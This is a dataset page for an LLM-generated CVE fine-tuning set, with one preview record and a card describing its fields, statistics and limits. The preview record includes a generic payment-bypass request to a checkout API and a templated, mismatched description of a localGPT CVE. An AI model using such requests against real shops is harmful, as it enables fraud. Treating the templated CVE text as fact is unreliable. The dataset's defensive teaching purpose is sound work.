# Exploit PoC: Logic flaw in business process (Unknown) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2026-5002
2026-03-28T17:16:45.450
7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-74
Unknown
Unknown
There is a confirmed vulnerability reported by the vendor or community. Confirmed in Unknown with builds Unknown. Exposure depends on deployment, configuration, and affected version. The vendor advisory describes: A vulnerability has been found in PromtEngineer localGPT up to 4d41c7d1713b16b216d8e062e51a5dd88b20b054. T...
The impact depends on the network context, permissions, and data present. Impact: the patch diff and advisories provide precise scope. The exploit is reliable and requires no victim interaction. CVSS 7.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L.
The attacker monitors underground forums for variants and bypasses. The attacker researches the vulnerability and develops a working proof of concept. The attacker seeks privilege escalation or remote execution. The PoC works against default installations of Unknown Unknown.
Prioritize fixes based on Internet exposure and CVSS score. Revoke any potentially compromised credentials. Establish patching SLAs based on CVE severity. Assess the fix's impact on upstream and downstream dependencies. The fix must be validated specifically for Unknown versions Unknown. Given the high severity, apply ...
# Example: Race condition in Unknown (Unknown) # VULNERABLE: check-then-act without synchronization if balance >= amount: balance -= amount transfer(amount) # Two concurrent requests can both pass the check and double-spend. # SAFE: atomic operation with locking with lock: if balance >= amount: bal...
# Exploit PoC: Generic input validation bypass (Unknown) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depending on ...
End of preview. Expand in Data Studio

CVE SFT Dataset v5

10,000 Records NVD/NIST 12 Fields CC BY 4.0 SFT

CVE SFT Dataset v5 is a structured instruction-following dataset for fine-tuning language models on cybersecurity vulnerability analysis. Built by Auren Research, it combines authoritative vulnerability metadata from the NIST National Vulnerability Database (NVD) with five generated fields that teach models to explain, reason about, and remediate real-world CVEs — including side-by-side vulnerable vs. safe code examples.

Unlike most security datasets that provide only raw CVE descriptions and CVSS scores, this dataset trains models to produce structured, actionable security intelligence: attack scenarios, root cause analysis, and concrete remediation steps with validation.


Why This Dataset

Security-focused LLMs face a consistent gap: they can recite CVE descriptions but struggle to reason about exploitation paths, explain root causes to non-experts, or generate accurate remediation guidance. This dataset directly addresses that gap by providing:

  • Plain-language explanations accessible to non-security audiences
  • Technical deep dives covering root cause, impact, and attack context
  • Attack scenarios structured as recon → execution → objective
  • Remediation guidance with immediate fix + 3 additional mitigations + validation steps
  • Vulnerable vs. safe code pairs — the most requested and rarest field in open security datasets

This dataset was built by a researcher with hands-on vulnerability research experience, including reported findings on HackerOne across blockchain and smart contract targets.


Dataset Statistics

Attribute Value
Total records 10,000
Columns 12
Source (metadata) NIST NVD
Source (generated fields) LLM-generated, curated
Language English
Format Parquet
License CC BY 4.0

Severity Distribution

Severity CVSS Range Count Percentage
Critical 9.0 – 10.0 982 9.8%
High 7.0 – 8.9 3,735 37.4%
Medium 4.0 – 6.9 4,131 41.3%
Low 0.1 – 3.9 439 4.4%
No score 713 7.1%

Top 10 CWE Categories

Rank CWE Type Count
1 CWE-79 Cross-Site Scripting (XSS) 913
2 CWE-Other Miscellaneous 684
3 CWE-22 Path Traversal 381
4 CWE-862 Missing Authorization 344
5 CWE-89 SQL Injection 336
6 CWE-74 Injection (general) 320
7 CWE-416 Use-After-Free 304
8 CWE-918 Server-Side Request Forgery 272
9 CWE-77 Command Injection 240
10 CWE-20 Improper Input Validation 225

Dataset Schema

Column Source Description Avg Length
cve_id NVD CVE identifier (e.g. CVE-2026-33980)
published_date NVD Publication date
cvss_score NVD CVSS score (0.0 – 10.0)
cvss_vector NVD Full CVSS vector string (e.g. AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
cwe_id NVD Weakness category (e.g. CWE-79, CWE-89)
affected_software NVD Affected product/vendor
affected_versions NVD Vulnerable version range
plain_explanation Generated Accessible English explanation of the vulnerability ~697 chars
technical_deep_dive Generated Root cause + impact + technical context ~267 chars
attack_scenario Generated Structured attack path: recon → execution → objective ~271 chars
remediation Generated Immediate fix + 3 additional mitigations + validation ~433 chars
vulnerable_code_example Generated Side-by-side vulnerable and safe code in the affected language ~664 chars

Data Quality

Deduplication was performed on all generated fields. Results:

Field Exact Duplicates Rate Grade
plain_explanation 0 0.0% Excellent
remediation 4 0.0% Excellent
attack_scenario 61 0.6% Excellent
technical_deep_dive 160 1.6% Good
vulnerable_code_example 182 1.8% Good

The low duplication rates — particularly 0% on plain_explanation and near-zero on remediation — indicate the generated content is genuinely diverse and not template-collapsed.


Usage

from datasets import load_dataset
import pandas as pd

# Load via HuggingFace datasets
ds = load_dataset("auren-research/cve-sft-v5", split="train")

# Or load directly from parquet
df = pd.read_parquet("cve_sft_dataset_v5.parquet")

# Example: filter critical CVEs with code examples
critical = df[
    (df["cvss_score"] >= 9.0) &
    (df["vulnerable_code_example"].str.len() > 100)
]
print(f"Critical CVEs with code examples: {len(critical)}")

# Example: inspect a single record
row = df.iloc[0]
print(f"CVE: {row['cve_id']}")
print(f"CVSS: {row['cvss_score']} | CWE: {row['cwe_id']}")
print(f"\nPlain explanation:\n{row['plain_explanation']}")
print(f"\nAttack scenario:\n{row['attack_scenario']}")
print(f"\nRemediation:\n{row['remediation']}")

SFT Training Example

def format_for_sft(row):
    """Format a CVE record as an instruction-following example."""
    instruction = (
        f"Analyze the following vulnerability: {row['cve_id']}\n"
        f"Affected software: {row['affected_software']}\n"
        f"CVSS Score: {row['cvss_score']} | CWE: {row['cwe_id']}\n"
        f"CVSS Vector: {row['cvss_vector']}"
    )
    response = (
        f"## Plain Explanation\n{row['plain_explanation']}\n\n"
        f"## Technical Deep Dive\n{row['technical_deep_dive']}\n\n"
        f"## Attack Scenario\n{row['attack_scenario']}\n\n"
        f"## Remediation\n{row['remediation']}\n\n"
        f"## Code Example\n{row['vulnerable_code_example']}"
    )
    return {"instruction": instruction, "response": response}

df["formatted"] = df.apply(format_for_sft, axis=1)

Intended Use Cases

  • Fine-tuning security-focused LLMs on structured vulnerability reasoning
  • Training code security assistants using the vulnerable/safe code pairs
  • Security education — teaching developers to recognize and fix common vulnerability patterns
  • Red team tooling — grounding LLM-based recon and exploitation reasoning in real CVE data
  • Benchmarking LLM security knowledge across CWE categories and severity levels
  • RAG pipelines for security operations centers (SOC) and vulnerability management platforms

Limitations

  • Generated fields are LLM-produced and have not been manually reviewed by security researchers for every record. A small number of records (~2%) may contain templated or lower-quality outputs in technical_deep_dive and vulnerable_code_example
  • Code examples are illustrative and may not exactly reproduce the specific CVE's vulnerable codebase — they demonstrate the vulnerability class, not the exact affected code
  • Attack scenarios are structured for educational purposes and intentionally omit weaponizable exploit details
  • Coverage bias: the dataset reflects NVD publication patterns — CWE-79 (XSS) is heavily represented because it is the most commonly reported vulnerability class
  • Version coverage: records use NVD data as of v5 build date — newer CVEs are not included

Ethical Considerations

This dataset is intended for defensive security use cases: training models that help developers write safer code, security teams triage vulnerabilities faster, and organizations understand their exposure.

The attack scenarios are structured at a conceptual level (recon → execution → objective) and do not include weaponized exploit code, working proof-of-concept payloads, or specific bypass techniques for active CVEs.

Users should not use this dataset to build tools that automate offensive exploitation of unpatched systems.


Citation

@dataset{auren2026cvesft,
  title   = {CVE SFT Dataset v5: Structured Vulnerability Intelligence for LLM Fine-Tuning},
  author  = {Francisco Antonio Da Costa Barroso},
  year    = {2026},
  publisher = {Auren Research},
  url     = {https://huggingface.co/datasets/auren-research/cve-sft-v5}
}

Related Work from Auren Research

  • PII Shield — 3.1M+ multilingual PII detection examples across 6 languages
  • Lunaris Guard — Dual-head multilingual safety classifier (ROC-AUC 0.979 on prompt injection)
  • Lunaris MoC — Novel sparse Transformer architecture with mediator-based expert collaboration

Built by Francisco Antonio Da Costa Barroso · Auren Research · 2026

Downloads last month
98